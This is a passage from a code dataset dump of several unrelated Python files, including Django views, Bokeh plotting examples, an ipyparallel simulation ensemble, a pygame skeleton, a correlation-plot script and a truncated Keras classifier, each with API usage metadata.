"line_number": 98, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ScrolledWindow", "line_number": 101, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 101, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PolicyType", "line_number": 102, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 102, "usage_type": "name"}, {"api_name": "canvas.Canvas", "line_number": 105, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 114, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 114, "usage_type": "name"}, {"api_name": "gi.repository.GLib.source_remove", "line_number": 118, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "119565027", "text": "# -*- coding: utf8 -*- \nfrom django.http import HttpResponse\nfrom django.template import Context,Template\nimport datetime\nimport json\n\ndef hello(request):\n\treturn HttpResponse(\"Hello world\")\n\n\ndef hours_ahead(request,offset):\n\ttry:\n\t\toffset = int(offset)\n\texcept ValueError:\n\t\traise Http404()\n\t# assert False \n\tdt = datetime.datetime.now() + datetime.timedelta(hours = offset)\n\thtml = \"In %s hour(s), it will be %s.\" % (offset, dt)\n\treturn HttpResponse(html)\n\ndef current_datetime(request):\n\tnow = datetime.datetime.now()\n\tt = Template(\" It is now{{current_date}}.\")\n\thtml = Context({'current_date':now})\n\thtml = t.render(html)\n\treturn HttpResponse(html)\n\ndef getSex(request):\n\ts = {\"data\":[{\"value\":18173,\"name\":u\"男\".encode('utf-8')},\n\t{\"value\":27518,\"name\":u\"女\".encode('utf-8')},{\"value\":11078,\"name\":u\"未知\".encode('utf-8')}]}\n\ts = json.dumps(s,ensure_ascii=False)\n\treturn HttpResponse(s,'content_type=\"application/json')\ndef gao():\n\tans = []\n\tf = open('new3.txt','r')\n\tf = f.readlines()\n\tfor i in f:\n\t\ti = i.split()\n\t\td = {}\n\t\td['value'] = i[1]\n\t\td['name'] = i[0]\n\t\tans.append(d)\n\taim = {}\n\taim['data'] = ans\n\ts = 
json.dumps(aim,ensure_ascii=False)\n\treturn s\ndef getProvince(request):\n\treturn HttpResponse(gao(), content_type='application/json')\n\n\ndef gao1():\n\tf = open('new2.txt','r')\n\tf = f.readlines()\n\td = {}\n\tfor i in f:\n\t\tt = i.split()\n\t\tif(len(t)!=3):\n\t\t\tcontinue;\n\t\tif t[1] != '安徽':\n\t\t\tcontinue\n\t\ttry:\n\t\t\td[t[2]] += 1;\n\t\texcept:\n\t\t\td[t[2]] = 1;\n\tans = []\n\tfor i in d:\n\t\tc = {}\n\t\tc['name'] = i;\n\t\tc['value'] = d[i]\n\t\tans.append(c)\n\taim = {}\n\taim['data'] = ans\n\treturn json.dumps(aim,ensure_ascii = False)\n\ndef getCity(request):\n\treturn HttpResponse(gao1(), content_type='application/json')\n", "sub_path": "mysite/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1763, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.http.HttpResponse", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.template.Template", "line_number": 23, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "595934811", "text": "from django.conf.urls import url\nfrom .views import ArticleDetailAndCreateCommentView, ArticleCreateView, ArticleListView, ArticleUpdateView, ArticleDeleteView, OwnersArticleListView\nfrom .views import delete_comment\n\n\nurlpatterns = [\n url(r'^$', ArticleListView.as_view(), name='list'),\n url(r'^owner/(?P<pk>\d+)/$', OwnersArticleListView.as_view(), name='owners_articles'),\n url(r'^(?P<pk>\d+)/$', ArticleDetailAndCreateCommentView.as_view(), name='detail'),\n url(r'^new/$', ArticleCreateView.as_view(), name='create'),\n url(r'^(?P<pk>\d+)/edit/$', ArticleUpdateView.as_view(), name='update'),\n url(r'^(?P<pk>\d+)/delete/$', ArticleDeleteView.as_view(), name='delete'),\n url(r'^(?P<pk>\d+)/comment_delete/$', delete_comment, name='comment_delete'),\n url(r'^select_template/$',\n 'articles.views.select_template', name='select_template'),\n]\n", "sub_path": "articles/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleListView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleListView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, 
{"api_name": "views.OwnersArticleListView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.OwnersArticleListView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleDetailAndCreateCommentView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleDetailAndCreateCommentView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleCreateView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleCreateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticleUpdateView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticleUpdateView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.ArticleDeleteView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.ArticleDeleteView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.delete_comment", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "256571916", "text": "from __future__ import print_function\n\nimport numpy as np\n\nfrom bokeh.browserlib import view\nfrom bokeh.document import Document\nfrom bokeh.models.glyphs import *\nfrom bokeh.models import (\n Plot, Range1d, LinearAxis, Grid, ColumnDataSource, PanTool, WheelZoomTool\n)\nfrom bokeh.session import Session\n\ndocument = Document()\nsession = Session()\nsession.use_doc('prim_server')\nsession.load_document(document)\n\nx = np.arange(1,6)\ny = np.arange(5, 0, -1)\n\nsource = ColumnDataSource(data=dict(x=x,y=y))\n\nxdr = Range1d(start=0, end=10)\nydr = Range1d(start=0, end=10)\n\ndef make_plot(name, glyph):\n plot = Plot(x_range=xdr, y_range=ydr, min_border=80)\n\n plot.add_glyph(source, glyph)\n\n xaxis = LinearAxis()\n plot.add_layout(xaxis, 'below')\n\n yaxis = LinearAxis()\n plot.add_layout(yaxis, 'left')\n\n plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))\n plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))\n\n plot.add_tools(PanTool(), WheelZoomTool())\n\n document.add(plot)\n session.store_document(document)\n\nmake_plot('annular_wedge', AnnularWedge(x=\"x\", y=\"y\", inner_radius=0.2, outer_radius=0.5, start_angle=0.8, end_angle=3.8))\nmake_plot('annulus', Annulus(x=\"x\", y=\"y\", inner_radius=0.2, outer_radius=0.5))\nmake_plot('arc', Arc(x=\"x\", y=\"y\", radius=0.4, start_angle=0.8, end_angle=3.8))\nmake_plot('circle', Circle(x=\"x\", y=\"y\", radius=1))\nmake_plot('oval', Oval(x=\"x\", y=\"y\", width=0.5, height=0.8, angle=-0.6))\nmake_plot('ray', Ray(x=\"x\", y=\"y\", length=25, angle=0.6))\nmake_plot('rect', Rect(x=\"x\", y=\"y\", width=0.5, height=0.8, angle=-0.6))\nmake_plot('text', Text(x=\"x\", y=\"y\", text={\"value\":\"foo\"}, angle=0.6))\nmake_plot('wedge', Wedge(x=\"x\", y=\"y\", radius=0.5, start_angle=0.9, end_angle=3.2))\n\nlink = session.object_link(document.context)\nprint(\"please visit %s to see plots\" % link)\nview(link)\n", "sub_path": "examples/glyphs/prim_server.py", "file_name": "prim_server.py", "file_ext": "py", "file_size_in_byte": 1835, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "bokeh.document.Document", "line_number": 13, "usage_type": "call"}, {"api_name": "bokeh.session.Session", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 21, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 23, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 24, "usage_type": "call"}, {"api_name": "bokeh.models.Plot", "line_number": 27, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 31, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 34, "usage_type": "call"}, {"api_name": "bokeh.models.Grid", "line_number": 37, "usage_type": "call"}, {"api_name": "bokeh.models.Grid", "line_number": 38, "usage_type": "call"}, {"api_name": "bokeh.models.PanTool", "line_number": 40, "usage_type": "call"}, {"api_name": "bokeh.models.WheelZoomTool", "line_number": 40, "usage_type": "call"}, {"api_name": "bokeh.browserlib.view", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "174329141", "text": "from __future__ import print_function\n\nfrom ipyparallel import Client\nfrom EXOSIMS.Prototypes.SurveyEnsemble import SurveyEnsemble \nfrom EXOSIMS.util.get_module import get_module\nimport time\nfrom IPython.core.display import clear_output\nimport sys\nimport json\nimport os\nimport numpy as np\nimport EXOSIMS\nimport EXOSIMS.MissionSim\nimport os\nimport os.path\nimport cPickle\nimport random\nimport traceback\n\n\nclass IPClusterEnsemble(SurveyEnsemble):\n \"\"\"Parallelized suvey ensemble based on IPython parallel (ipcluster)\n \n \"\"\"\n\n def __init__(self, **specs):\n \n SurveyEnsemble.__init__(self, **specs)\n\n self.verb = specs.get('verbose', True)\n \n # access the cluster\n self.rc = Client()\n self.dview = self.rc[:]\n self.dview.block = True\n with self.dview.sync_imports(): import EXOSIMS, EXOSIMS.util.get_module, \\\n os, os.path, time, random, cPickle, traceback\n if specs.has_key('logger'):\n specs.pop('logger')\n if specs.has_key('seed'):\n specs.pop('seed')\n self.dview.push(dict(specs=specs))\n res = self.dview.execute(\"SS = EXOSIMS.util.get_module.get_module(specs['modules'] \\\n ['SurveySimulation'], 'SurveySimulation')(**specs)\")\n\n res2 = self.dview.execute(\"SS.reset_sim()\")\n\n self.vprint(\"Created SurveySimulation objects on %d engines.\"%len(self.rc.ids))\n #for row in res.stdout:\n # self.vprint(row)\n\n self.lview = self.rc.load_balanced_view()\n\n self.maxNumEngines = len(self.rc.ids)\n\n def run_ensemble(self, sim, nb_run_sim, run_one=None, genNewPlanets=True,\n rewindPlanets=True, kwargs={}):\n \"\"\"\n Args:\n sim:\n\n \"\"\"\n\n t1 = time.time()\n async_res = []\n for j in range(nb_run_sim):\n ar = self.lview.apply_async(run_one, genNewPlanets=genNewPlanets,\n rewindPlanets=rewindPlanets, **kwargs)\n async_res.append(ar)\n \n print(\"Submitted %d tasks.\"%len(async_res))\n \n runStartTime = time.time()#create job starting time\n avg_time_per_run = 0.\n tmplenoutstandingset = nb_run_sim\n tLastRunFinished = time.time()\n ar= self.rc._asyncresult_from_jobs(async_res)\n while not ar.ready():\n ar.wait(10.)\n clear_output(wait=True)\n if ar.progress > 0:\n timeleft = ar.elapsed/ar.progress * (nb_run_sim - ar.progress)\n if timeleft > 3600.:\n timeleftstr = \"%2.2f 
hours\"%(timeleft/3600.)\n elif timeleft > 60.:\n timeleftstr = \"%2.2f minutes\"%(timeleft/60.)\n else:\n timeleftstr = \"%2.2f seconds\"%timeleft\n else:\n timeleftstr = \"who knows\"\n\n #Terminate hanging runs\n outstandingset = self.rc.outstanding#a set of msg_ids that have been submitted but resunts have not been received\n if len(outstandingset) > 0 and len(outstandingset) < nb_run_sim:#there is at least 1 run still going and we have not just started\n avg_time_per_run = (time.time() - runStartTime)/float(nb_run_sim - len(outstandingset))#compute average amount of time per run\n if len(outstandingset) < tmplenoutstandingset:#The scheduler has finished a run\n tmplenoutstandingset = len(outstandingset)#update this. should decrease by ~1 or number of cores...\n tLastRunFinished = time.time()#update tLastRunFinished to the last time a simulation finished (right now)\n #self.vprint(\"tmplenoutstandingset %d, tLastRunFinished %0.6f\"%(tmplenoutstandingset,tLastRunFinished))\n if time.time() - tLastRunFinished > avg_time_per_run*(1 + self.maxNumEngines*2):\n self.vprint('Aborting ' + str(len(self.rc.outstanding)) + 'qty outstandingset jobs')\n self.rc.abort()#by default should abort all outstanding jobs... #it is possible that this will not stop the jobs running\n\n print(\"%4i/%i tasks finished after %4i s. About %s to go.\" % (ar.progress, nb_run_sim, ar.elapsed, timeleftstr), end=\"\")\n sys.stdout.flush()\n\n t2 = time.time()\n print(\"\\nCompleted in %d sec\" % (t2 - t1))\n \n res = [ar.get() for ar in async_res]\n \n return res\n", "sub_path": "EXOSIMS/SurveyEnsemble/IPClusterEnsemble.py", "file_name": "IPClusterEnsemble.py", "file_ext": "py", "file_size_in_byte": 4434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble", "line_number": 21, "usage_type": "name"}, {"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble", "line_number": 28, "usage_type": "name"}, {"api_name": "ipyparallel.Client", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "time.time", "line_number": 76, "usage_type": "call"}, {"api_name": "IPython.core.display.clear_output", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 105, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 105, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "84137019", "text": "\n#coding:utf-8\nimport requests\nimport json\n\ndict_create_dealer={\n \"head\": {\n \"version\": \"0.01\",\n \"msgtype\": \"request\",\n \"interface\": \"get_will_d4\",\n \"remark\": \"\"\n },\n \"params\": {\n \"system\": \"HJXMBA\",\n \"dealerid\": \"200283093\"\n }\n}\n\n\n#print(dict_create_dealer)\nstrDictDealer=json.dumps(dict_create_dealer,ensure_ascii=False)\nprint('post json是{0}'.format(strDictDealer))\n#print(data)\n\nmyheaders = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, compress',\n 
'Accept-Language': 'en-us;q=0.5,en;q=0.3',\n             'Cache-Control': 'max-age=0',\n             'Connection': 'keep-alive',\n             'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}\nr=requests.post('http://10.0.10.182:8000/channel_org_interface',strDictDealer.encode('utf-8'))\nprint('Response: {0}'.format(r.content.decode('utf-8')))\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "other/getDealerCanRelateD.py", "file_name": "getDealerCanRelateD.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "311860482", "text": "import pygame as pg\nimport numpy as np\n\n# Define Classes**************************************************************************************************************************\nclass Object:\n\n    def __init__(self, image, x, y):\n        self.image = pg.image.load(image)\n        self.x = x\n        self.y = y\n\n    def move(self, x, y):\n        self.x += x\n        self.y += y\n\n    def draw(self):\n        gameDisplay.blit(self.image, (self.x, self.y))\n\nclass Spritesheet:\n    def __init__(self, filename):\n        try:\n            self.sheet = pg.image.load(filename).convert()\n\n        except pg.error as e:\n            print(f\"Unable to load sprite sheet image: {filename}\")\n            raise SystemExit(e)\n\n    def image_at(self, rectangle, colorkey = None):\n        rect = pg.Rect(rectangle)\n        image = pg.Surface(rect.size).convert()\n        image.blit(self.sheet, (0,0), rect)\n        if colorkey is not None: # apply the color key only when one was requested\n            if colorkey == -1: # -1 means: sample the key from the top-left pixel\n                colorkey = image.get_at((0,0))\n            image.set_colorkey(colorkey, pg.RLEACCEL)\n        return image\n\n    def images_at(self, rects, colorkey = None):\n        return [self.image_at(rect,colorkey) for rect in rects]\n\n    def load_strip(self, rect, image_count, colorkey = None):\n        tups = [(rect[0]+rect[2]*x, rect[1], rect[2], rect[3])\n                for x in range(image_count)]\n        return self.images_at(tups, colorkey)\n\nclass Tile:\n\n    def __init__(self, type, image, x, y, z, width, height):\n        self.type = type\n        self.image = image\n        self.x = x\n        self.y = y\n        self.z = z\n        self.width = width\n        self.height = height\n\nclass Terrain:\n\n    def __init__(self, spritesheet, tile_width, tile_height, world_width, world_height):\n        self.spritesheet = spritesheet\n        self.tile_width = tile_width\n        self.tile_height = tile_height\n        self.world_width = world_width\n        self.world_height = world_height\n        self.z_offset = tile_height / 2\n\n    def draw(self):\n        for x in range(self.world_width):\n            for y in range(self.world_height):\n                pass # tile drawing not implemented yet\n        return 0\n\n\ndef generate_tiles(terrain):\n    for x in range(terrain.world_width):\n        for y in range(terrain.world_height):\n            tiles[x][y] = 0\n\n# define global variables**********************************************************************************************************\ndisplay_width = 800\ndisplay_height = 600\n\nplayer_movex = 0\nplayer_movey = 0\n\ntiles = [[None] * 10 for _ in range(10)] # assumed 10x10 grid to match the Terrain below; the original assigned into an undefined name\n\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\n\nend = False\n\n# create instances***********************************************************************************************************\npg.init()\ngameDisplay = pg.display.set_mode((display_width,display_height))\npg.display.set_caption('Manhunt')\nclock = pg.time.Clock()\n\n# create objects****************************************************************************************************************\nman = Object('man.png', display_width / 2, display_height / 2)\nterrain = 
Terrain(Spritesheet(\"tilesheet.png\"), 64, 64, 10, 10)\n\n# mainloop***********************************************************************************************************************\nwhile not end:\n\n # event handler*********************************************************************************************************\n for event in pg.event.get():\n if event.type == pg.QUIT:\n end = True\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n player_movex = -1\n elif event.key == pg.K_RIGHT:\n player_movex = 1\n\n if event.key == pg.K_UP:\n player_movey = -1\n elif event.key == pg.K_DOWN:\n player_movey = 1\n\n if event.type == pg.KEYUP:\n if event.key == pg.K_UP or pg.K_DOWN:\n player_movey = 0\n if event.key == pg.K_LEFT or pg.K_RIGHT:\n player_movex = 0\n\n # update game*****************************************************************************************************************\n gameDisplay.fill(white)\n man.move(player_movex,player_movey)\n generate_tiles(terrain)\n man.draw()\n pg.display.update()\n clock.tick(60)\n\npg.quit()\nquit()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.error", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.RLEACCEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.display", 
"line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "279016529", "text": "import os, sys, pdb\nimport pandas as pd, numpy as np\nfrom matplotlib.colors import Normalize, rgb2hex, LogNorm\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import r2_score\n\n\ndef score_avg_mos_corr():\n data = pd.read_csv('./results/Capitals/Capitals_gru_hi_predictions.csv')\n data2 = pd.read_csv('./results/Capitals/capitals_combined_scores.csv')\n data2 = data2.rename(columns={'Unnamed: 0':'State'})\n data = data[data.Location.str.contains('45')]\n\n scores, avgs = list(), list()\n for state in np.unique(data.Location):\n try:\n scores.append(data2[data2.State==state].Score.iloc[0])\n avgs.append(np.mean(data[data.Location==state].MoLS))\n except:\n pass\n avgs = np.asarray(avgs)\n scores = np.asarray(scores)\n\n avg_norm = LogNorm(vmin=avgs.min(), vmax=avgs.max())\n score_norm = LogNorm(vmin=scores.min(), vmax=scores.max())\n\n avgs = avg_norm(avgs)\n scores=score_norm(scores)\n \n corr, _ = pearsonr(avgs, scores)\n r2 = r2_score(avgs, scores)\n print('Pearson correlation: {}'.format(corr))\n print('R^2: {}'.format(r2))\n\n\ndef samples_corr():\n capitals = pd.read_pickle('./data/capitals.pd')\n capitals = capitals[~capitals.Location.str.contains('85')]\n capitals = capitals[~capitals.Location.str.contains('California')]\n capitals = capitals[~capitals.Location.str.contains('Arizona')]\n capitals = capitals[~capitals.Location.str.contains('Texas')]\n capitals = capitals[~capitals.Location.str.contains('Wisconsin')]\n capitals = capitals[~capitals.Location.str.contains('Minnesota')]\n capitals = capitals[~capitals.Location.str.contains('North Carolina')]\n capitals = capitals[~capitals.Location.str.contains('Delaware')]\n capitals = capitals[~capitals.Location.str.contains('New Jersey')]\n capitals = capitals[capitals.Year==2016].reset_index(drop=True)\n capitals['Avg_Temp'] = capitals[['Max_Temp','Min_Temp']].mean(axis=1)\n \n train = pd.read_pickle('./data/train_data.pd')\n train = train[train.Year==2016].reset_index(drop=True)\n train['Avg_Temp'] = train[['Max_Temp','Min_Temp']].mean(axis=1)\n \n test = pd.read_pickle('./data/test_data.pd')\n test = test[test.Year==2016].reset_index(drop=True)\n test['Avg_Temp'] = test[['Max_Temp','Min_Temp']].mean(axis=1)\n \n capitals_group = capitals[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n train_group = train[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n test_group = test[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n\n fig, axs = plt.subplots(1,3)\n names = ['Avg_Temp', 'Precip', 'MoLS']\n name_dic = {'Avg_Temp':'Average Temperature', 'Precip':'Precipitation', 'MoLS':'MoLS'}\n for i in range(0,3):\n corr_data = pd.DataFrame()\n for group in train_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n for group in test_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n for group in capitals_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n corr_data = corr_data.astype('float').corr()\n corr_data = corr_data.iloc[0:len(train_group),len(train_group):]\n im = axs[i].imshow(corr_data,cmap='Greys_r', vmin=-0.2, vmax=1)\n axs[i].axvline(x=len(test_group)-0.5, color='tab:blue', linestyle='-', linewidth=2)\n axs[i].set_xticks(ticks=np.arange(corr_data.shape[1]))\n 
axs[i].set_xticklabels(labels=(['']*corr_data.shape[1]))\n axs[i].set_yticks(ticks=np.arange(corr_data.shape[0]))\n axs[i].set_yticklabels(labels=(['']*corr_data.shape[0]))\n axs[i].set_title(name_dic[names[i]])\n axs[i].set_ylabel('Training')\n axs[i].text(6,len(train_group)+6,'Testing')\n axs[i].text(len(test_group)+6,len(train_group)+6,'Capital Cities')\n plt.colorbar(im, ax=axs.ravel().tolist(), shrink=0.8, pad=0.02)\n plt.show() \n\n\nif __name__ == '__main__':\n font={'size':16}\n mpl.rc('font',**font)\n\n samples_corr()\n score_avg_mos_corr()\n \n\n", "sub_path": "figures/fig_12_input_correlations.py", "file_name": "fig_12_input_correlations.py", "file_ext": "py", "file_size_in_byte": 4198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 27, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.rc", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "149462135", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.optimizers import Adam\nfrom keras.utils.np_utils import to_categorical\n\nn_pts = 500\ncenters = [[-1, 1], [-1, -1], [1, -1], [1, 1], [0, 0]]\nX, y = datasets.make_blobs(n_samples=n_pts, random_state=123, centers=centers, cluster_std=0.4)\n\n# plt.scatter(X[y==0, 0], X[y==0, 1])\n# plt.scatter(X[y==1, 0], X[y==1, 1])\n# plt.scatter(X[y==2, 0], X[y==2, 1])\n# plt.scatter(X[y==3, 0], X[y==3, 1])\n# plt.scatter(X[y==4, 0], X[y==4, 1])\n# plt.show()\n\ny_cat = to_categorical(y, 5)\nmodel = Sequential()\nmodel.add(Dense(units=5, input_shape=(2,), activation='softmax'))\nmodel.compile(Adam(0.1), loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(x=X, y=y_cat, verbose=1, batch_size=50, epochs=100)\n\ndef 
